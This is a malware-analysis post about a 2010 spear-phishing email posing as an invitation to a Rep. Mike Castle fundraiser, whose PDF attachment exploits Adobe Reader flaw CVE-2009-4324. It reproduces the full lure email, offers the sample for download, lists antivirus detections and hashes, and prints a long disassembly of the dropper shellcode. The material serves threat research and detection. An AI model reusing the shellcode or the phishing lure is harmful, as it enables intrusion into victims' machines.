Feb 10 CVE-2009-4324 Rep. Mike Castle faking @ssd.com sender 2010-02-10 10:08 AM

This post is to be continued...

•  CVE-2009-4324 Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009.

• Download 7775E7ADE13D73919E8DCA4695AE7D0A- Invitation to Mike Castle Event.pdf as a password protected archive (contact me if you need the password)

• Download 7775E7ADE13D73919E8DCA4695AE7D0A-Unpackedpdfs+JS-byVilly (password protected, use the scheme or contact me)

According to  Villy (thanks, Villy :)) the file contains two embedded pdfs - one small with js exploiting CVE-2009-4324 and one larger clean file. There is also a xored exe between those two files.

It is a very nice package.

 
From:[Redacted] [mailto:[Redacted]@gmail.com]
Sent: 2010-02-10 10:08 AM
Subject: Rep. Mike Castle

Attached is an invitation for a February 15 reception honoring Rep. Mike Castle (R-De) in his candidacy for the U.S. Senate.   I hope you will be able to join us.

Although his expected Democrat opponent has dropped out of the race, the New Castle County Executive has already announced his intention to seek the Democractic nomination.  Hence, Mike's political situation is strong, but the Democrats are expected to make a full scale contest out of this race.

Presuming your support, Mike will make a great contribution in the Senate for Delaware and the Country.

Please send your response to me at: [Redacted]@gmail.com

All best,

[Redacted]
[Redacted]
[Redacted]@ssd.com

Direct: +1.[Redacted]
Fax: +1.[Redacted]
Mobile: +[Redacted]

Squire Sanders Public Advocacy, LLC
a wholly owned non-law firm affiliate of
Squire, Sanders & Dempsey L.L.P.
Suite 500
1201 Pennsylvania Avenue, N.W.
Washington, D.C. 20004

sspa.ssd.com

Squire Sanders|Legal Counsel Worldwide
32 Offices in 15 Countries
Cincinnati • Cleveland • Columbus • Houston • Los Angeles • Miami • New York • Palo Alto • Phoenix • San Francisco • Tallahassee • Tampa • Tysons Corner • Washington DC • West Palm Beach | Bogotá+ • Buenos Aires+ • Caracas • La Paz+ • Lima+ • Panamá+ • Rio de Janeiro • Santiago+ • Santo  Domingo • São Paulo | Bratislava • Brussels • Bucharest+ • Budapest • Dublin+ • Frankfurt • Kyiv • London • Moscow • Prague • Riyadh+ • Warsaw | Beijing • Hong Kong • Shanghai • Tokyo
+Independent Network Firm

NOTICE: This email message and all attachments transmitted with it are intended solely for the use of the addressees and may contain legally privileged, protected or confidential information. If you have received this message in error, please notify the sender immediately by email reply and please delete this message from your computer and destroy any copies.


IRS Circular 230 Notice: To comply with U.S. Treasury regulations, we advise you that any U.S. federal tax advice included in this communication is not intended or written to be used, and cannot be used, to avoid any U.S. federal tax penalties or to promote, market, or recommend to another party any transaction or matter.


Original PDF
 http://www.virustotal.com/analisis/70f43ed12ff8c48156f5d1ad9e09f12ecbcff77f64bbc8a2f58566e3e9f3c06f-1265828519
  File Invitation_to_Mike_Castle_Event.p received on 2010.02.10 19:01:59 (UTC)
Result: 1/41 (2.44%)
Sophos     4.50.0     2010.02.10     Mal/PDFEx-D
File size: 325206 bytes
MD5   : 7775e7ade13d73919e8dca4695ae7d0a

The first unpacked pdf 1.pdf with CVE-2009-4324
http://www.virustotal.com/analisis/e83a2b658f404731e314a8646e258d17a383ac474564c3d5f6ccd36ad2a93c3d-1266008863
Result: 5/41 (12.2%)
Loading server information...
Avast    4.8.1351.0    2010.02.12    JS:Pdfka-gen
BitDefender    7.2    2010.02.12    Exploit.PDF-JS.Gen
GData    19    2010.02.12    Exploit.PDF-JS.Gen
nProtect    2009.1.8.0    2010.02.12    Exploit.PDF-JS.Gen.C02
Sunbelt    5671    2010.02.11    Exploit.PDF-JS.Gen (v)

File size: 7221 bytes
MD5...: caf3ff27a9688097cf13906c117513ef

1.pdf shellcode (again by Villy)

text:00401020 inc ecx .text:00401021 inc ecx .text:00401022 inc ecx .text:00401023 call loc_401029 .text:00401023 ; --------------------------------------------------------------------------- .text:00401028 db 0 .text:00401029 ; --------------------------------------------------------------------------- .text:00401029 .text:00401029 loc_401029: ; CODE XREF: .text:00401023 j .text:00401029 mov ecx, [esp] .text:0040102C add esp, 4 .text:0040102F lea ecx, [ecx+12h] .text:00401032 .text:00401032 loc_401032: ; CODE XREF: .text:00401039 j .text:00401032 inc ecx .text:00401033 xor byte ptr [ecx], 67h .text:00401036 cmp byte ptr [ecx], 90h .text:00401039 jnz short loc_401032 .text:0040103B push 11h .text:0040103D push 0ACC8h .text:00401042 push 9CC8h .text:00401047 push 1000h .text:0040104C push 0B720h .text:00401051 push 0ACD9h .text:00401056 push 0 .text:00401058 push offset unk_163F9 .text:0040105D push esp .text:0040105E cld .text:0040105F push 94E43293h .text:00401064 push 741F8DC4h .text:00401069 push 130F36B2h .text:0040106E push 0FF0D6657h .text:00401073 push 1A22F51h .text:00401078 push 837DE239h .text:0040107D push 6118F28Fh .text:00401082 push 0DBACBE43h .text:00401087 push 0B4FFAFEDh .text:0040108C push 0A19922A9h .text:00401091 push 0AC0A138Eh .text:00401096 push 0E58B879Bh .text:0040109B mov esi, esp .text:0040109D lea edi, [esi-30h] .text:004010A0 xor ebx, ebx .text:004010A2 mov bh, 4 .text:004010A4 sub esp, ebx .text:004010A6 push esp .text:004010A7 xor edx, edx .text:004010A9 mov ebx, fs:[edx+30h] .text:004010AD mov ecx, [ebx+0Ch] .text:004010B0 mov ecx, [ecx+1Ch] .text:004010B3 mov ecx, [ecx] .text:004010B5 mov ebp, [ecx+8] .text:004010B8 .text:004010B8 loc_4010B8: ; CODE XREF: .text:00401108 j .text:004010B8 lodsd .text:004010B9 cmp eax, 94E43293h .text:004010BE jnz short $+2 .text:004010C0 pusha .text:004010C1 mov eax, [ebp+3Ch] .text:004010C4 mov ecx, [ebp+eax+78h] .text:004010C8 add ecx, ebp .text:004010CA mov ebx, [ecx+20h] .text:004010CD add ebx, ebp .text:004010CF xor edi, edi .text:004010D1 .text:004010D1 loc_4010D1: ; CODE XREF: .text:004010EB j .text:004010D1 inc edi .text:004010D2 mov esi, [ebx+edi*4] .text:004010D5 add esi, ebp .text:004010D7 cdq .text:004010D8 .text:004010D8 loc_4010D8: ; CODE XREF: .text:004010E5 j .text:004010D8 movsx eax, byte ptr [esi] .text:004010DB cmp al, ah .text:004010DD jz short loc_4010E7 .text:004010DF ror edx, 7 .text:004010E2 add edx, eax .text:004010E4 inc esi .text:004010E5 jmp short loc_4010D8 .text:004010E7 ; --------------------------------------------------------------------------- .text:004010E7 .text:004010E7 loc_4010E7: ; CODE XREF: .text:004010DD j .text:004010E7 cmp edx, [esp+1Ch] .text:004010EB jnz short loc_4010D1 .text:004010ED mov ebx, [ecx+24h] .text:004010F0 add ebx, ebp .text:004010F2 mov di, [ebx+edi*2] .text:004010F6 mov ebx, [ecx+1Ch] .text:004010F9 add ebx, ebp .text:004010FB add ebp, [ebx+edi*4] .text:004010FE xchg eax, ebp .text:004010FF pop edi .text:00401100 stosd .text:00401101 push edi .text:00401102 popa .text:00401103 cmp eax, 94E43293h .text:00401108 jnz short loc_4010B8 .text:0040110A sub esp, 800h .text:00401110 mov ebp, esp .text:00401112 mov eax, [edi-4] .text:00401115 add eax, 5 .text:00401118 mov [edi-4], eax .text:0040111B mov eax, [edi-14h] .text:0040111E add eax, 5 .text:00401121 mov [edi-14h], eax .text:00401124 push 0 .text:00401126 call dword ptr [edi-30h] .text:00401129 xor ecx, ecx .text:0040112B xor ebx, ebx .text:0040112D cmp byte ptr [eax], 3Ah .text:00401130 jnz short loc_401133 .text:00401132 inc ebx .text:00401133 .text:00401133 loc_401133: ; CODE XREF: .text:00401130 j .text:00401133 ; .text:00401138 j ... .text:00401133 inc ecx .text:00401134 cmp byte ptr [eax+ecx], 3Ah .text:00401138 jnz short loc_401133 .text:0040113A inc ebx .text:0040113B cmp ebx, 2 .text:0040113E jnz short loc_401133 .text:00401140 dec ecx .text:00401141 add eax, ecx .text:00401143 mov [ebp+100h], eax .text:00401149 xor ecx, ecx .text:0040114B .text:0040114B loc_40114B: ; CODE XREF: .text:00401150 j .text:0040114B inc ecx .text:0040114C cmp byte ptr [eax+ecx], 22h .text:00401150 jnz short loc_40114B .text:00401152 mov byte ptr [eax+ecx], 0 .text:00401156 push 0 .text:00401158 push 80h .text:0040115D push 3 .text:0040115F push 0 .text:00401161 push 3 .text:00401163 push 80000000h .text:00401168 mov esi, [ebp+100h] .text:0040116E push esi .text:0040116F call $+5 .text:00401174 pop eax .text:00401175 add eax, 0Dh .text:00401178 push eax .text:00401179 push ebp .text:0040117A mov ebp, esp .text:0040117C mov eax, [edi-4] .text:0040117F jmp eax .text:00401181 ; --------------------------------------------------------------------------- .text:00401181 mov [edi+34h], eax .text:00401184 push ebp .text:00401185 push 100h .text:0040118A call dword ptr [edi-18h] .text:0040118D lea esi, [ebp+100h] .text:00401193 push esi .text:00401194 push 0 .text:00401196 push 0 .text:00401198 push ebp .text:00401199 call dword ptr [edi-28h] .text:0040119C push 0 .text:0040119E push 0 .text:004011A0 push 2 .text:004011A2 push 0 .text:004011A4 push 0 .text:004011A6 push 40000000h .text:004011AB push esi .text:004011AC call $+5 .text:004011B1 pop eax .text:004011B2 add eax, 0Dh .text:004011B5 push eax .text:004011B6 push ebp .text:004011B7 mov ebp, esp .text:004011B9 mov eax, [edi-4] .text:004011BC jmp eax .text:004011BE ; --------------------------------------------------------------------------- .text:004011BE cmp eax, 0 .text:004011C1 jle loc_401433 .text:004011C7 mov [ebp+600h], eax .text:004011CD mov ebx, [edi+44h] .text:004011D0 mov esi, [edi+34h] .text:004011D3 push 0 .text:004011D5 push 0 .text:004011D7 push ebx .text:004011D8 push esi .text:004011D9 call dword ptr [edi-20h] .text:004011DC mov ebx, [edi+48h] .text:004011DF mov dword ptr [ebp+604h], 400h .text:004011E9 .text:004011E9 loc_4011E9: ; CODE XREF: .text:00401263 j .text:004011E9 push 0 .text:004011EB lea eax, [ebp+700h] .text:004011F1 push eax .text:004011F2 push 400h .text:004011F7 lea eax, [ebp+200h] .text:004011FD push eax .text:004011FE mov esi, [edi+34h] .text:00401201 push esi .text:00401202 call dword ptr [edi-0Ch] .text:00401205 mov eax, ebx .text:00401207 sub eax, 400h .text:0040120C cmp eax, 0 .text:0040120F jg short loc_401217 .text:00401211 mov [ebp+604h], ebx .text:00401217 .text:00401217 loc_401217: ; CODE XREF: .text:0040120F j .text:00401217 xor ecx, ecx .text:00401219 .text:00401219 loc_401219: ; CODE XREF: .text:00401239 j .text:00401219 lea esi, [ebp+ecx+200h] .text:00401220 lodsb .text:00401221 xor al, cl .text:00401223 ror al, 3 .text:00401226 xchg edi, edx .text:00401228 lea edi, [ebp+ecx+200h] .text:0040122F stosb .text:00401230 xchg edi, edx .text:00401232 inc ecx .text:00401233 cmp ecx, [ebp+604h] .text:00401239 jnz short loc_401219 .text:0040123B push 0 .text:0040123D lea eax, [ebp+704h] .text:00401243 push eax .text:00401244 push dword ptr [ebp+604h] .text:0040124A lea eax, [ebp+200h] .text:00401251 ; --------------------------------------------------------------------------- .text:00401251 push dword ptr [ebp+600h] .text:00401252 mov ch, 0 .text:00401252 ; --------------------------------------------------------------------------- .text:00401255 db 0 .text:00401256 db 0 .text:00401257 ; --------------------------------------------------------------------------- .text:00401257 call dword ptr [edi-8] .text:0040125A sub ebx, 400h ; CODE XREF: .text:004012BC j .text:00401260 cmp ebx, 0 .text:00401263 jg short loc_4011E9 .text:00401265 push dword ptr [ebp+600h] ; CODE XREF: .text:004012CA j .text:0040126B call dword ptr [edi-10h] .text:0040126E push 0 .text:00401270 lea esi, [ebp+100h] .text:00401276 push esi .text:00401277 call $+5 .text:0040127C pop eax .text:0040127D add eax, 0Dh .text:00401280 push eax .text:00401281 push ebp .text:00401282 mov ebp, esp .text:00401284 mov eax, [edi-14h] .text:00401287 jmp eax .text:00401289 ; --------------------------------------------------------------------------- .text:00401289 push 0 .text:0040128B push 0 .text:0040128D push dword ptr [edi+4Ch] .text:00401290 push dword ptr [edi+34h] .text:00401293 call dword ptr [edi-20h] .text:00401296 push 0 .text:00401298 lea eax, [ebp+700h] .text:0040129E push eax .text:0040129F push dword ptr [edi+50h] .text:004012A2 lea eax, [ebp+100h] .text:004012A8 push eax .text:004012A9 push dword ptr [edi+34h] .text:004012AA ja short near ptr loc_4012DC+4 .text:004012AD push edi .text:004012B3 jl short near ptr loc_4012B6+4 .text:004012B6 .text:004012B6 loc_4012B6: .text:004012B6 add [ebp-8], dh .text:004012BB push eax .text:004012BC xchg edi, ebx .text:004012BE lea edi, [ebp+eax+0] .text:004012C5 ; --------------------------------------------------------------------------- .text:004012C5 add [eax], eax .text:004012C9 movsb .text:004012CA ; --------------------------------------------------------------------------- .text:004012CA xchg edi, ebx .text:004012CC push 0 .text:004012D1 add ch, [edx+0] .text:004012D1 ; --------------------------------------------------------------------------- .text:004012D7 db 0 .text:004012D8 db 0 .text:004012D9 db 0 .text:004012DA ; --------------------------------------------------------------------------- .text:004012DA inc eax .text:004012DB push ebp .text:004012DC .text:004012DC loc_4012DC: .text:004012DC call $+5 .text:004012E1 pop eax .text:004012E2 add eax, 0Dh .text:004012E5 push eax .text:004012E6 push ebp .text:004012E7 mov ebp, esp .text:004012E9 mov eax, [edi-4] .text:004012EC jmp eax .text:004012EE ; --------------------------------------------------------------------------- .text:004012EE cmp eax, 0 .text:004012F1 jle loc_401433 .text:004012F7 mov [ebp+600h], eax .text:004012FD mov ebx, [edi+3Ch] .text:00401300 mov esi, [edi+34h] .text:00401303 push 0 .text:00401305 push 0 .text:00401307 push ebx .text:00401308 push esi .text:00401309 call dword ptr [edi-20h] .text:0040130C mov ebx, [edi+40h] .text:0040130F mov dword ptr [ebp+604h], 400h .text:00401319 .text:00401319 loc_401319: ; CODE XREF: .text:0040136C j .text:00401319 push 0 .text:0040131B lea eax, [ebp+700h] .text:00401321 push eax .text:00401322 push 400h .text:00401327 lea eax, [ebp+200h] .text:0040132D push eax .text:0040132E push esi .text:00401334 sub eax, 400h .text:00401335 .text:00401335 loc_401335: .text:00401335 add [eax+eax], al .text:00401339 cmp eax, 0 .text:0040133B add [edi+6], bh .text:0040133F popf .text:00401340 add al, 6 .text:00401343 add [edx+0], ch .text:00401349 pop es .text:00401349 ; --------------------------------------------------------------------------- .text:0040134A db 0 .text:0040134B db 0 .text:0040134C ; --------------------------------------------------------------------------- .text:0040134C push eax .text:0040134D push dword ptr [ebp+604h] .text:00401353 lea eax, [ebp+200h] .text:00401359 push eax .text:0040135A push dword ptr [ebp+600h] .text:0040135B mov ch, 0 .text:0040135B ; --------------------------------------------------------------------------- .text:0040135E db 0 .text:0040135F db 0 .text:00401360 db 0FFh .text:00401361 ; --------------------------------------------------------------------------- .text:00401361 push edi .text:00401362 clc .text:00401363 sub ebx, 400h .text:00401369 cmp ebx, 0 .text:0040136C jg short loc_401319 .text:0040136E push dword ptr [ebp+600h] .text:00401374 call dword ptr [edi-10h] .text:00401377 lea esi, [ebp+100h] .text:0040137D push 100h .text:00401382 push esi .text:00401383 push 0 .text:00401385 call dword ptr [edi-24h] .text:00401388 mov byte ptr [ebp+0FFh], 22h .text:0040138F xor ecx, ecx .text:00401391 .text:00401391 loc_401391: ; CODE XREF: .text:0040139A j .text:00401391 inc ecx .text:00401392 cmp byte ptr [ebp+ecx+100h], 0 .text:0040139A jnz short loc_401391 .text:0040139C mov dword ptr [ebp+ecx+100h], 732F2022h .text:004013A7 add ecx, 4 .text:004013AA mov word ptr [ebp+ecx+100h], 2220h .text:004013B4 add ecx, 2 .text:004013B7 xchg edi, ebx .text:004013B9 xor edx, edx .text:004013BB .text:004013BB loc_4013BB: ; CODE XREF: .text:004013CC j .text:004013BB lea esi, [ebp+edx+0] .text:004013BF lodsb .text:004013C0 lea edi, [ebp+ecx+100h] .text:004013C7 ; --------------------------------------------------------------------------- .text:004013C7 stosb .text:004013C8 inc ecx .text:004013C9 inc edx .text:004013CA cmp al, 0 .text:004013CC jnz short loc_4013BB .text:004013CE dec ecx .text:004013CF mov byte ptr [ebp+ecx+100h], 22h .text:004013D7 mov dword ptr [ebp+0EBh], 2E444D43h .text:004013E1 mov dword ptr [ebp+0EFh], 20455845h .text:004013EB mov word ptr [ebp+0F3h], 632Fh .text:004013F4 mov byte ptr [ebp+0F5h], 20h .text:004013FB mov dword ptr [ebp+0F6h], 6B736174h .text:00401405 mov dword ptr [ebp+0FAh], 7473696Ch .text:0040140F mov byte ptr [ebp+0FEh], 26h .text:00401416 xchg edi, ebx .text:00401418 lea eax, [ebp+0EBh] .text:0040141E push 0 .text:00401420 push eax .text:00401421 call $+5 .text:00401426 pop eax .text:00401427 add eax, 0Dh .text:0040142A push eax .text:0040142B push ebp .text:0040142C mov ebp, esp .text:0040142E mov eax, [edi-14h] .text:00401431 jmp eax .text:00401433 ; --------------------------------------------------------------------------- .text:00401433 .text:00401433 loc_401433: ; CODE XREF: .text:004011C1 j .text:00401433 ; .text:004012F1 j .text:00401433 push 0 .text:00401438 push edi .text:0040143E div edi .text:00401440 test dword ptr [eax], 0 .text:00401440 ;